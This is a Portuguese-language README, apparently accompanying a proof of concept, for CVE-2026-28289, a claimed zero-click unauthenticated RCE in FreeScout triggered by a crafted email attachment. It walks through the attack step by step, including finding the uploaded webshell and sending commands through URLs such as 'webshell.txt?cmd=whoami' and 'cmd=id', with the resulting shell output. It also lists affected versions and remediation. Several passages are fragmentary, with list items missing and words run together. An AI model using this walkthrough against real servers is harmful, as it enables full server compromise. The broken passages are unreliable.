
CVE-2026-28289

RCE Não Autenticada de Zero-Clique no FreeScout via Bypass de Anexo de E-mail
CVE-2026-28289, apelidada de Mail2Shell, é uma vulnerabilidade crítica de Execução Remota de Código (RCE) de zero-clique que afeta o FreeScout.
Um atacante pode enviar um e-mail especialmente criado para uma caixa de entrada do FreeScout e obter acesso remoto ao shell do servidor subjacente — sem autenticação e sem interação do utilizador.
| Campo | Valor |
|---|
| ID CVE | CVE-2026-28289 |
| Gravidade | 🔴 Crítica |
| CVSS | 10.0 (Máximo) |
| Vetor de Ataque | Remoto (E-mail) |
| Autenticação Necessária | ❌ Nenhuma |
| Interação do Utilizador | ❌ Nenhuma |
| Impacto | Comprometimento Total do Servidor |
O atacante envia um e-mail com um anexo especialmente criado.
O FreeScout tenta bloquear ficheiros perigosos como .htaccess, mas o atacante:
O atacante acede ao ficheiro enviado através do caminho web e executa comandos arbitrários.
Resultado:
# Acesso remoto ao shell obtido
whoami
www-data

✅ E-mail enviado com sucesso! (RCE de zero-clique acionada)
Verá também as instruções para os próximos passos impressas.
find no seu servidor FreeScout via SSHEle retornará imediatamente o caminho real completo para o ficheiro enviado, por exemplo:
/var/www/html/storage/attachment/2026/03/05/15/webshell.txt
(ou pasta de data/hora semelhante — isto confirma que o FreeScout salvou o anexo automaticamente).
Copie o caminho do passo 2 e abra este URL:
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=whoami
Verá esta saída exata (texto simples):
www-data
(Ou qualquer que seja o utilizador Apache/PHP no seu servidor — normalmente www-data, apache ou nobody).
Agora altere o comando e recarregue:
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=id
Verá:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
E para ls -la:
total 12
drwxr-xr-x 2 www-data www-data 4096 Mar 5 15:00 .
drwxr-xr-x 8 www-data www-data 4096 Mar 5 14:00 ..
-rw-r--r-- 1 www-data www-data 87 Mar 5 15:00 webshell.txt
Esta saída aparece diretamente na página do navegador (dentro de tags <pre> do webshell). Sem erro, sem código fonte PHP, sem 404.
Isto significa que tem execução remota de código total no servidor — o bypass do .htaccess + espaço de largura zero funcionou perfeitamente, e o anexo do e-mail foi processado sem qualquer interação do utilizador.
Todas as versões do FreeScout:
<= 1.8.206
Atualize imediatamente para:
1.8.207 ou posterior
AllowOverride All na configuração do ApacheProcure por:
.htaccess suspeitos/storage/attachments/Indicadores de compromisso podem incluir:
.htaccess desconhecidos em pastas de anexosE-mail → Anexo Malicioso (Nome de ficheiro com prefixo Unicode)
↓
Salvo em caminho previsível
↓
Execução acessível via web
↓
Shell remoto
Esta questão contornou as proteções adicionadas em:
Demonstrando lógica incompleta de sanitização de nomes de ficheiros.
| Área de Risco | Impacto |
|---|---|
| Confidencialidade | 🔴 Alto |
| Integridade | 🔴 Alto |
| Disponibilidade | 🔴 Alto |
Se executa uma instância auto-hospedada do FreeScout:
🔥 Atualize imediatamente. 💡 Assuma comprometimento se estiver a executar versões vulneráveis expostas à internet. 🛡 Realize revisão de logs e verificações de integridade.